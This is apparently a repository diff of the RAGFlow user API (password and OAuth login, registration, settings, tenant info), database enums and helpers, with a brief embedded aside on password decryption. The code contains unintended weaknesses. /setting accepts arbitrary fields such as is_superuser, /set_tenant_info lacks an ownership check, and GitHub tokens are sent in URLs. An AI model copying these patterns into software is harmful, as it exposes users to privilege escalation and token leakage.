                "email": userinfo["email"],
                "avatar": avatar,
                "nickname": userinfo["login"],
                "login_channel": "github",
                "last_login_time": get_format_time(),
                "is_superuser": False,
            })
            if not users:
                raise Exception('Register user failure.')
            if len(users) > 1:
                raise Exception('Same E-mail exist!')
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            stat_logger.exception(e)
            return redirect("/?error=%s" % str(e))
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


@manager.route('/feishu_callback', methods=['GET'])
def feishu_callback():
    import requests
    app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
        "app_id": FEISHU_OAUTH.get("app_id"),
        "app_secret": FEISHU_OAUTH.get("app_secret")
    }), headers={"Content-Type": "application/json; charset=utf-8"})
    app_access_token_res = app_access_token_res.json()
    if app_access_token_res['code'] != 0:
        return redirect("/?error=%s" % app_access_token_res)

    res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
        "grant_type": FEISHU_OAUTH.get("grant_type"),
        "code": request.args.get('code')
    }), headers={"Content-Type": "application/json; charset=utf-8",
                 'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
    res = res.json()
    if res['code'] != 0:
        return redirect("/?error=%s" % res["message"])

    if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
        return redirect("/?error=contact:user.email:readonly not in scope")
    session["access_token"] = res["data"]["access_token"]
    session["access_token_from"] = "feishu"
    userinfo = user_info_from_feishu(session["access_token"])
    users = UserService.query(email=userinfo["email"])
    user_id = get_uuid()
    if not users:
        try:
            try:
                avatar = download_img(userinfo["avatar_url"])
            except Exception as e:
                stat_logger.exception(e)
                avatar = ""
            users = user_register(user_id, {
                "access_token": session["access_token"],
                "email": userinfo["email"],
                "avatar": avatar,
                "nickname": userinfo["en_name"],
                "login_channel": "feishu",
                "last_login_time": get_format_time(),
                "is_superuser": False,
            })
            if not users:
                raise Exception('Register user failure.')
            if len(users) > 1:
                raise Exception('Same E-mail exist!')
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            stat_logger.exception(e)
            return redirect("/?error=%s" % str(e))
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


def user_info_from_feishu(access_token):
    import requests
    headers = {"Content-Type": "application/json; charset=utf-8",
               'Authorization': f"Bearer {access_token}"}
    res = requests.get(
        f"https://open.feishu.cn/open-apis/authen/v1/user_info",
        headers=headers)
    user_info = res.json()["data"]
    user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
    return user_info


def user_info_from_github(access_token):
    import requests
    headers = {"Accept": "application/json",
               'Authorization': f"token {access_token}"}
    res = requests.get(
        f"https://api.github.com/user?access_token={access_token}",
        headers=headers)
    user_info = res.json()
    email_info = requests.get(
        f"https://api.github.com/user/emails?access_token={access_token}",
        headers=headers).json()
    user_info["email"] = next(
        (email for email in email_info if email['primary'] == True),
        None)["email"]
    return user_info


@manager.route("/logout", methods=['GET'])
@login_required
def log_out():
    current_user.access_token = ""
    current_user.save()
    logout_user()
    return get_json_result(data=True)


@manager.route("/setting", methods=["POST"])
@login_required
def setting_user():
    update_dict = {}
    request_data = request.json
    if request_data.get("password"):
        new_password = request_data.get("new_password")
        if not check_password_hash(
                current_user.password, decrypt(request_data["password"])):
            return get_json_result(
                data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg='Password error!')

        if new_password:
            update_dict["password"] = generate_password_hash(
                decrypt(new_password))

    for k in request_data.keys():
        if k in ["password", "new_password"]:
            continue
        update_dict[k] = request_data[k]

    try:
        UserService.update_by_id(current_user.id, update_dict)
        return get_json_result(data=True)
    except Exception as e:
        stat_logger.exception(e)
        return get_json_result(
            data=False, retmsg='Update failure!', retcode=RetCode.EXCEPTION_ERROR)


@manager.route("/info", methods=["GET"])
@login_required
def user_info():
    return get_json_result(data=current_user.to_dict())


def rollback_user_registration(user_id):
    try:
        UserService.delete_by_id(user_id)
    except Exception as e:
        pass
    try:
        TenantService.delete_by_id(user_id)
    except Exception as e:
        pass
    try:
        u = UserTenantService.query(tenant_id=user_id)
        if u:
            UserTenantService.delete_by_id(u[0].id)
    except Exception as e:
        pass
    try:
        TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
    except Exception as e:
        pass


def user_register(user_id, user):
    user["id"] = user_id
    tenant = {
        "id": user_id,
        "name": user["nickname"] + "‘s Kingdom",
        "llm_id": CHAT_MDL,
        "embd_id": EMBEDDING_MDL,
        "asr_id": ASR_MDL,
        "parser_ids": PARSERS,
        "img2txt_id": IMAGE2TEXT_MDL
    }
    usr_tenant = {
        "tenant_id": user_id,
        "user_id": user_id,
        "invited_by": user_id,
        "role": UserTenantRole.OWNER
    }
    file_id = get_uuid()
    file = {
        "id": file_id,
        "parent_id": file_id,
        "tenant_id": user_id,
        "created_by": user_id,
        "name": "/",
        "type": FileType.FOLDER.value,
        "size": 0,
        "location": "",
    }
    tenant_llm = []
    for llm in LLMService.query(fid=LLM_FACTORY):
        tenant_llm.append({"tenant_id": user_id,
                           "llm_factory": LLM_FACTORY,
                           "llm_name": llm.llm_name,
                           "model_type": llm.model_type,
                           "api_key": API_KEY,
                           "api_base": LLM_BASE_URL
                           })

    if not UserService.save(**user):
        return
    TenantService.insert(**tenant)
    UserTenantService.insert(**usr_tenant)
    TenantLLMService.insert_many(tenant_llm)
    FileService.insert(file)
    return UserService.query(email=user["email"])


@manager.route("/register", methods=["POST"])
@validate_request("nickname", "email", "password")
def user_add():
    req = request.json
    if UserService.query(email=req["email"]):
        return get_json_result(
            data=False, retmsg=f'Email: {req["email"]} has already registered!', retcode=RetCode.OPERATING_ERROR)
    if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", req["email"]):
        return get_json_result(data=False, retmsg=f'Invaliad e-mail: {req["email"]}!',
                               retcode=RetCode.OPERATING_ERROR)

    user_dict = {
        "access_token": get_uuid(),
        "email": req["email"],
        "nickname": req["nickname"],
        "password": decrypt(req["password"]),
        "login_channel": "password",
        "last_login_time": get_format_time(),
        "is_superuser": False,
    }

    user_id = get_uuid()
    try:
        users = user_register(user_id, user_dict)
        if not users:
            raise Exception('Register user failure.')
        if len(users) > 1:
            raise Exception('Same E-mail exist!')
        user = users[0]
        login_user(user)
        return cors_reponse(data=user.to_json(),
                            auth=user.get_id(), retmsg="Welcome aboard!")
    except Exception as e:
        rollback_user_registration(user_id)
        stat_logger.exception(e)
        return get_json_result(
            data=False, retmsg='User registration failure!', retcode=RetCode.EXCEPTION_ERROR)


@manager.route("/tenant_info", methods=["GET"])
@login_required
def tenant_info():
    try:
        tenants = TenantService.get_by_user_id(current_user.id)[0]
        return get_json_result(data=tenants)
    except Exception as e:
        return server_error_response(e)


@manager.route("/set_tenant_info", methods=["POST"])
@login_required
@validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
def set_tenant_info():
    req = request.json
    try:
        tid = req["tenant_id"]
        del req["tenant_id"]
        TenantService.update_by_id(tid, req)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import re
from datetime import datetime

from flask import request, session, redirect
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import login_required, current_user, login_user, logout_user

from api.db.db_models import TenantLLM
from api.db.services.llm_service import TenantLLMService, LLMService
from api.utils.api_utils import server_error_response, validate_request
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
from api.db import UserTenantRole, LLMType, FileType
from api.settings import RetCode, GITHUB_OAUTH, FEISHU_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, \
    API_KEY, \
    LLM_FACTORY, LLM_BASE_URL, RERANK_MDL
from api.db.services.user_service import UserService, TenantService, UserTenantService
from api.db.services.file_service import FileService
from api.settings import stat_logger
from api.utils.api_utils import get_json_result, construct_response


@manager.route('/login', methods=['POST', 'GET'])
def login():
    if not request.json:
        return get_json_result(data=False,
                               retcode=RetCode.AUTHENTICATION_ERROR,
                               retmsg='Unauthorized!')

    email = request.json.get('email', "")
    users = UserService.query(email=email)
    if not users:
        return get_json_result(data=False,
                               retcode=RetCode.AUTHENTICATION_ERROR,
                               retmsg=f'Email: {email} is not registered!')

    password = request.json.get('password')
    try:
        password = decrypt(password)
    except BaseException:
        return get_json_result(data=False,
                               retcode=RetCode.SERVER_ERROR,
                               retmsg='Fail to crypt password')

    user = UserService.query_user(email, password)
    if user:
        response_data = user.to_json()
        user.access_token = get_uuid()
        login_user(user)
        user.update_time = current_timestamp(),
        user.update_date = datetime_format(datetime.now()),
        user.save()
        msg = "Welcome back!"
        return construct_response(data=response_data, auth=user.get_id(), retmsg=msg)
    else:
        return get_json_result(data=False,
                               retcode=RetCode.AUTHENTICATION_ERROR,
                               retmsg='Email and password do not match!')


@manager.route('/github_callback', methods=['GET'])
def github_callback():
    import requests
    res = requests.post(GITHUB_OAUTH.get("url"),
                        data={
                            "client_id": GITHUB_OAUTH.get("client_id"),
                            "client_secret": GITHUB_OAUTH.get("secret_key"),
                            "code": request.args.get('code')},
                        headers={"Accept": "application/json"})
    res = res.json()
    if "error" in res:
        return redirect("/?error=%s" % res["error_description"])

    if "user:email" not in res["scope"].split(","):
        return redirect("/?error=user:email not in scope")

    session["access_token"] = res["access_token"]
    session["access_token_from"] = "github"
    user_info = user_info_from_github(session["access_token"])
    email_address = user_info["email"]
    users = UserService.query(email=email_address)
    user_id = get_uuid()
    if not users:
        # User isn't registered yet; try to register
        try:
            try:
                avatar = download_img(user_info["avatar_url"])
            except Exception as e:
                stat_logger.exception(e)
                avatar = ""
            users = user_register(user_id, {
                "access_token": session["access_token"],
                "email": email_address,
                "avatar": avatar,
                "nickname": user_info["login"],
                "login_channel": "github",
                "last_login_time": get_format_time(),
                "is_superuser": False,
            })
            if not users:
                raise Exception(f'Fail to register {email_address}.')
            if len(users) > 1:
                raise Exception(f'Same email: {email_address} exists!')

            # Try to log in
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            stat_logger.exception(e)
            return redirect("/?error=%s" % str(e))

    # User has already registered, try to log in
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


@manager.route('/feishu_callback', methods=['GET'])
def feishu_callback():
    import requests
    app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"),
                                         data=json.dumps({
                                             "app_id": FEISHU_OAUTH.get("app_id"),
                                             "app_secret": FEISHU_OAUTH.get("app_secret")
                                         }),
                                         headers={"Content-Type": "application/json; charset=utf-8"})
    app_access_token_res = app_access_token_res.json()
    if app_access_token_res['code'] != 0:
        return redirect("/?error=%s" % app_access_token_res)

    res = requests.post(FEISHU_OAUTH.get("user_access_token_url"),
                        data=json.dumps({
                            "grant_type": FEISHU_OAUTH.get("grant_type"),
                            "code": request.args.get('code')
                        }),
                        headers={
                            "Content-Type": "application/json; charset=utf-8",
                            'Authorization': f"Bearer {app_access_token_res['app_access_token']}"
                        })
    res = res.json()
    if res['code'] != 0:
        return redirect("/?error=%s" % res["message"])

    if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
        return redirect("/?error=contact:user.email:readonly not in scope")
    session["access_token"] = res["data"]["access_token"]
    session["access_token_from"] = "feishu"
    user_info = user_info_from_feishu(session["access_token"])
    email_address = user_info["email"]
    users = UserService.query(email=email_address)
    user_id = get_uuid()
    if not users:
        # User isn't registered yet; try to register
        try:
            try:
                avatar = download_img(user_info["avatar_url"])
            except Exception as e:
                stat_logger.exception(e)
                avatar = ""
            users = user_register(user_id, {
                "access_token": session["access_token"],
                "email": email_address,
                "avatar": avatar,
                "nickname": user_info["en_name"],
                "login_channel": "feishu",
                "last_login_time": get_format_time(),
                "is_superuser": False,
            })
            if not users:
                raise Exception(f'Fail to register {email_address}.')
            if len(users) > 1:
                raise Exception(f'Same email: {email_address} exists!')

            # Try to log in
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            stat_logger.exception(e)
            return redirect("/?error=%s" % str(e))

    # User has already registered, try to log in
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


def user_info_from_feishu(access_token):
    import requests
    headers = {"Content-Type": "application/json; charset=utf-8",
               'Authorization': f"Bearer {access_token}"}
    res = requests.get(
        f"https://open.feishu.cn/open-apis/authen/v1/user_info",
        headers=headers)
    user_info = res.json()["data"]
    user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
    return user_info


def user_info_from_github(access_token):
    import requests
    headers = {"Accept": "application/json",
               'Authorization': f"token {access_token}"}
    res = requests.get(
        f"https://api.github.com/user?access_token={access_token}",
        headers=headers)
    user_info = res.json()
    email_info = requests.get(
        f"https://api.github.com/user/emails?access_token={access_token}",
        headers=headers).json()
    user_info["email"] = next(
        (email for email in email_info if email['primary'] == True),
        None)["email"]
    return user_info


@manager.route("/logout", methods=['GET'])
@login_required
def log_out():
    current_user.access_token = ""
    current_user.save()
    logout_user()
    return get_json_result(data=True)


@manager.route("/setting", methods=["POST"])
@login_required
def setting_user():
    update_dict = {}
    request_data = request.json
    if request_data.get("password"):
        new_password = request_data.get("new_password")
        if not check_password_hash(
                current_user.password, decrypt(request_data["password"])):
            return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg='Password error!')

        if new_password:
            update_dict["password"] = generate_password_hash(decrypt(new_password))

    for k in request_data.keys():
        if k in ["password", "new_password"]:
            continue
        update_dict[k] = request_data[k]

    try:
        UserService.update_by_id(current_user.id, update_dict)
        return get_json_result(data=True)
    except Exception as e:
        stat_logger.exception(e)
        return get_json_result(data=False, retmsg='Update failure!', retcode=RetCode.EXCEPTION_ERROR)


@manager.route("/info", methods=["GET"])
@login_required
def user_profile():
    return get_json_result(data=current_user.to_dict())


def rollback_user_registration(user_id):
    try:
        UserService.delete_by_id(user_id)
    except Exception as e:
        pass
    try:
        TenantService.delete_by_id(user_id)
    except Exception as e:
        pass
    try:
        u = UserTenantService.query(tenant_id=user_id)
        if u:
            UserTenantService.delete_by_id(u[0].id)
    except Exception as e:
        pass
    try:
        TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
    except Exception as e:
        pass


def user_register(user_id, user):
    user["id"] = user_id
    tenant = {
        "id": user_id,
        "name": user["nickname"] + "‘s Kingdom",
        "llm_id": CHAT_MDL,
        "embd_id": EMBEDDING_MDL,
        "asr_id": ASR_MDL,
        "parser_ids": PARSERS,
        "img2txt_id": IMAGE2TEXT_MDL,
        "rerank_id": RERANK_MDL
    }
    usr_tenant = {
        "tenant_id": user_id,
        "user_id": user_id,
        "invited_by": user_id,
        "role": UserTenantRole.OWNER
    }
    file_id = get_uuid()
    file = {
        "id": file_id,
        "parent_id": file_id,
        "tenant_id": user_id,
        "created_by": user_id,
        "name": "/",
        "type": FileType.FOLDER.value,
        "size": 0,
        "location": "",
    }
    tenant_llm = []
    for llm in LLMService.query(fid=LLM_FACTORY):
        tenant_llm.append({"tenant_id": user_id,
                           "llm_factory": LLM_FACTORY,
                           "llm_name": llm.llm_name,
                           "model_type": llm.model_type,
                           "api_key": API_KEY,
                           "api_base": LLM_BASE_URL
                           })

    if not UserService.save(**user):
        return
    TenantService.insert(**tenant)
    UserTenantService.insert(**usr_tenant)
    TenantLLMService.insert_many(tenant_llm)
    FileService.insert(file)
    return UserService.query(email=user["email"])


@manager.route("/register", methods=["POST"])
@validate_request("nickname", "email", "password")
def user_add():
    req = request.json
    email_address = req["email"]

    # Validate the email address
    if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", email_address):
        return get_json_result(data=False,
                               retmsg=f'Invalid email address: {email_address}!',
                               retcode=RetCode.OPERATING_ERROR)

    # Check if the email address is already used
    if UserService.query(email=email_address):
        return get_json_result(
            data=False,
            retmsg=f'Email: {email_address} has already registered!',
            retcode=RetCode.OPERATING_ERROR)

    # Construct user info data
    nickname = req["nickname"]
    user_dict = {
        "access_token": get_uuid(),
        "email": email_address,
        "nickname": nickname,
        "password": decrypt(req["password"]),
        "login_channel": "password",
        "last_login_time": get_format_time(),
        "is_superuser": False,
    }

    user_id = get_uuid()
    try:
        users = user_register(user_id, user_dict)
        if not users:
            raise Exception(f'Fail to register {email_address}.')
        if len(users) > 1:
            raise Exception(f'Same email: {email_address} exists!')
        user = users[0]
        login_user(user)
        return construct_response(data=user.to_json(),
                                  auth=user.get_id(),
                                  retmsg=f"{nickname}, welcome aboard!")
    except Exception as e:
        rollback_user_registration(user_id)
        stat_logger.exception(e)
        return get_json_result(data=False,
                               retmsg=f'User registration failure, error: {str(e)}',
                               retcode=RetCode.EXCEPTION_ERROR)


@manager.route("/tenant_info", methods=["GET"])
@login_required
def tenant_info():
    try:
        tenants = TenantService.get_by_user_id(current_user.id)[0]
        return get_json_result(data=tenants)
    except Exception as e:
        return server_error_response(e)


@manager.route("/set_tenant_info", methods=["POST"])
@login_required
@validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
def set_tenant_info():
    req = request.json
    try:
        tid = req["tenant_id"]
        del req["tenant_id"]
        TenantService.update_by_id(tid, req)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
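The reworked register/login pair above still runs the submitted password through decrypt() server-side, so a raw plaintext password fails with 'Fail to crypt password'. A hedged round-trip sketch follows; the /v1/user mount point is an assumption, and encrypt_password stands in for however the web front end pre-encrypts the password before sending it (it is not a helper defined in this repo).

    import requests

    BASE = "http://localhost:9380/v1/user"     # assumed mount point

    def register_and_login(nickname: str, email: str, plain_password: str):
        payload = {
            "nickname": nickname,
            "email": email,
            "password": encrypt_password(plain_password),  # hypothetical helper
        }
        r = requests.post(f"{BASE}/register", json=payload, timeout=5)
        body = r.json()
        # On success the auth token comes back in the "Authorization" response
        # header (see construct_response); keep it for authenticated calls.
        return r.headers.get("Authorization"), body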
16 api/contants.py Normal file
@@ -0,0 +1,16 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

NAME_LENGTH_LIMIT = 2 ** 10
@@ -1,93 +1,103 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from enum import Enum
from enum import IntEnum
from strenum import StrEnum


class StatusEnum(Enum):
    VALID = "1"
    INVALID = "0"


class UserTenantRole(StrEnum):
    OWNER = 'owner'
    ADMIN = 'admin'
    NORMAL = 'normal'


class TenantPermission(StrEnum):
    ME = 'me'
    TEAM = 'team'


class SerializedType(IntEnum):
    PICKLE = 1
    JSON = 2


class FileType(StrEnum):
    PDF = 'pdf'
    DOC = 'doc'
    VISUAL = 'visual'
    AURAL = 'aural'
    VIRTUAL = 'virtual'
    FOLDER = 'folder'
    OTHER = "other"


class LLMType(StrEnum):
    CHAT = 'chat'
    EMBEDDING = 'embedding'
    SPEECH2TEXT = 'speech2text'
    IMAGE2TEXT = 'image2text'


class ChatStyle(StrEnum):
    CREATIVE = 'Creative'
    PRECISE = 'Precise'
    EVENLY = 'Evenly'
    CUSTOM = 'Custom'


class TaskStatus(StrEnum):
    UNSTART = "0"
    RUNNING = "1"
    CANCEL = "2"
    DONE = "3"
    FAIL = "4"


class ParserType(StrEnum):
    PRESENTATION = "presentation"
    LAWS = "laws"
    MANUAL = "manual"
    PAPER = "paper"
    RESUME = "resume"
    BOOK = "book"
    QA = "qa"
    TABLE = "table"
    NAIVE = "naive"
    PICTURE = "picture"
    ONE = "one"


class FileSource(StrEnum):
    LOCAL = ""
    KNOWLEDGEBASE = "knowledgebase"
    S3 = "s3"

KNOWLEDGEBASE_FOLDER_NAME = ".knowledgebase"
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from enum import Enum
from enum import IntEnum
from strenum import StrEnum


class StatusEnum(Enum):
    VALID = "1"
    INVALID = "0"


class UserTenantRole(StrEnum):
    OWNER = 'owner'
    ADMIN = 'admin'
    NORMAL = 'normal'


class TenantPermission(StrEnum):
    ME = 'me'
    TEAM = 'team'


class SerializedType(IntEnum):
    PICKLE = 1
    JSON = 2


class FileType(StrEnum):
    PDF = 'pdf'
    DOC = 'doc'
    VISUAL = 'visual'
    AURAL = 'aural'
    VIRTUAL = 'virtual'
    FOLDER = 'folder'
    OTHER = "other"


class LLMType(StrEnum):
    CHAT = 'chat'
    EMBEDDING = 'embedding'
    SPEECH2TEXT = 'speech2text'
    IMAGE2TEXT = 'image2text'
    RERANK = 'rerank'
    TTS = 'tts'


class ChatStyle(StrEnum):
    CREATIVE = 'Creative'
    PRECISE = 'Precise'
    EVENLY = 'Evenly'
    CUSTOM = 'Custom'


class TaskStatus(StrEnum):
    UNSTART = "0"
    RUNNING = "1"
    CANCEL = "2"
    DONE = "3"
    FAIL = "4"


class ParserType(StrEnum):
    PRESENTATION = "presentation"
    LAWS = "laws"
    MANUAL = "manual"
    PAPER = "paper"
    RESUME = "resume"
    BOOK = "book"
    QA = "qa"
    TABLE = "table"
    NAIVE = "naive"
    PICTURE = "picture"
    ONE = "one"
    AUDIO = "audio"
    EMAIL = "email"
    KG = "knowledge_graph"


class FileSource(StrEnum):
    LOCAL = ""
    KNOWLEDGEBASE = "knowledgebase"
    S3 = "s3"


class CanvasType(StrEnum):
    ChatBot = "chatbot"
    DocBot = "docbot"

KNOWLEDGEBASE_FOLDER_NAME = ".knowledgebase"
1890 api/db/db_models.py
File diff suppressed because it is too large
@@ -1,130 +1,135 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import operator
from functools import reduce
from typing import Dict, Type, Union

from api.utils import current_timestamp, timestamp_to_date

from api.db.db_models import DB, DataBaseModel
from api.db.runtime_config import RuntimeConfig
from api.utils.log_utils import getLogger
from enum import Enum


LOGGER = getLogger()


@DB.connection_context()
def bulk_insert_into_db(model, data_source, replace_on_conflict=False):
    DB.create_tables([model])

    for i, data in enumerate(data_source):
        current_time = current_timestamp() + i
        current_date = timestamp_to_date(current_time)
        if 'create_time' not in data:
            data['create_time'] = current_time
        data['create_date'] = timestamp_to_date(data['create_time'])
        data['update_time'] = current_time
        data['update_date'] = current_date

    preserve = tuple(data_source[0].keys() - {'create_time', 'create_date'})

    batch_size = 1000

    for i in range(0, len(data_source), batch_size):
        with DB.atomic():
            query = model.insert_many(data_source[i:i + batch_size])
            if replace_on_conflict:
                query = query.on_conflict(preserve=preserve)
            query.execute()


def get_dynamic_db_model(base, job_id):
    return type(base.model(
        table_index=get_dynamic_tracking_table_index(job_id=job_id)))


def get_dynamic_tracking_table_index(job_id):
    return job_id[:8]


def fill_db_model_object(model_object, human_model_dict):
    for k, v in human_model_dict.items():
        attr_name = 'f_%s' % k
        if hasattr(model_object.__class__, attr_name):
            setattr(model_object, attr_name, v)
    return model_object


# https://docs.peewee-orm.com/en/latest/peewee/query_operators.html
supported_operators = {
    '==': operator.eq,
    '<': operator.lt,
    '<=': operator.le,
    '>': operator.gt,
    '>=': operator.ge,
    '!=': operator.ne,
    '<<': operator.lshift,
    '>>': operator.rshift,
    '%': operator.mod,
    '**': operator.pow,
    '^': operator.xor,
    '~': operator.inv,
}


def query_dict2expression(
        model: Type[DataBaseModel], query: Dict[str, Union[bool, int, str, list, tuple]]):
    expression = []

    for field, value in query.items():
        if not isinstance(value, (list, tuple)):
            value = ('==', value)
        op, *val = value

        field = getattr(model, f'f_{field}')
        value = supported_operators[op](
            field, val[0]) if op in supported_operators else getattr(
            field, op)(
            *val)
        expression.append(value)

    return reduce(operator.iand, expression)


def query_db(model: Type[DataBaseModel], limit: int = 0, offset: int = 0,
             query: dict = None, order_by: Union[str, list, tuple] = None):
    data = model.select()
    if query:
        data = data.where(query_dict2expression(model, query))
    count = data.count()

    if not order_by:
        order_by = 'create_time'
    if not isinstance(order_by, (list, tuple)):
        order_by = (order_by, 'asc')
    order_by, order = order_by
    order_by = getattr(model, f'f_{order_by}')
    order_by = getattr(order_by, order)()
    data = data.order_by(order_by)

    if limit > 0:
        data = data.limit(limit)
    if offset > 0:
        data = data.offset(offset)

    return list(data), count
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import operator
from functools import reduce
from typing import Dict, Type, Union

from playhouse.pool import PooledMySQLDatabase

from api.utils import current_timestamp, timestamp_to_date

from api.db.db_models import DB, DataBaseModel
from api.db.runtime_config import RuntimeConfig
from api.utils.log_utils import getLogger
from enum import Enum


LOGGER = getLogger()


@DB.connection_context()
def bulk_insert_into_db(model, data_source, replace_on_conflict=False):
    DB.create_tables([model])

    for i, data in enumerate(data_source):
        current_time = current_timestamp() + i
        current_date = timestamp_to_date(current_time)
        if 'create_time' not in data:
            data['create_time'] = current_time
        data['create_date'] = timestamp_to_date(data['create_time'])
        data['update_time'] = current_time
        data['update_date'] = current_date

    preserve = tuple(data_source[0].keys() - {'create_time', 'create_date'})

    batch_size = 1000

    for i in range(0, len(data_source), batch_size):
        with DB.atomic():
            query = model.insert_many(data_source[i:i + batch_size])
            if replace_on_conflict:
                if isinstance(DB, PooledMySQLDatabase):
                    query = query.on_conflict(preserve=preserve)
                else:
                    query = query.on_conflict(conflict_target="id", preserve=preserve)
            query.execute()


def get_dynamic_db_model(base, job_id):
    return type(base.model(
        table_index=get_dynamic_tracking_table_index(job_id=job_id)))


def get_dynamic_tracking_table_index(job_id):
    return job_id[:8]


def fill_db_model_object(model_object, human_model_dict):
    for k, v in human_model_dict.items():
        attr_name = 'f_%s' % k
        if hasattr(model_object.__class__, attr_name):
            setattr(model_object, attr_name, v)
    return model_object


# https://docs.peewee-orm.com/en/latest/peewee/query_operators.html
supported_operators = {
    '==': operator.eq,
    '<': operator.lt,
    '<=': operator.le,
    '>': operator.gt,
    '>=': operator.ge,
    '!=': operator.ne,
    '<<': operator.lshift,
    '>>': operator.rshift,
    '%': operator.mod,
    '**': operator.pow,
    '^': operator.xor,
    '~': operator.inv,
}


def query_dict2expression(
        model: Type[DataBaseModel], query: Dict[str, Union[bool, int, str, list, tuple]]):
    expression = []

    for field, value in query.items():
        if not isinstance(value, (list, tuple)):
            value = ('==', value)
        op, *val = value

        field = getattr(model, f'f_{field}')
        value = supported_operators[op](
            field, val[0]) if op in supported_operators else getattr(
            field, op)(
            *val)
        expression.append(value)

    return reduce(operator.iand, expression)


def query_db(model: Type[DataBaseModel], limit: int = 0, offset: int = 0,
             query: dict = None, order_by: Union[str, list, tuple] = None):
    data = model.select()
    if query:
        data = data.where(query_dict2expression(model, query))
    count = data.count()

    if not order_by:
        order_by = 'create_time'
    if not isinstance(order_by, (list, tuple)):
        order_by = (order_by, 'asc')
    order_by, order = order_by
    order_by = getattr(model, f'f_{order_by}')
    order_by = getattr(order_by, order)()
    data = data.order_by(order_by)

    if limit > 0:
        data = data.limit(limit)
    if offset > 0:
        data = data.offset(offset)

    return list(data), count
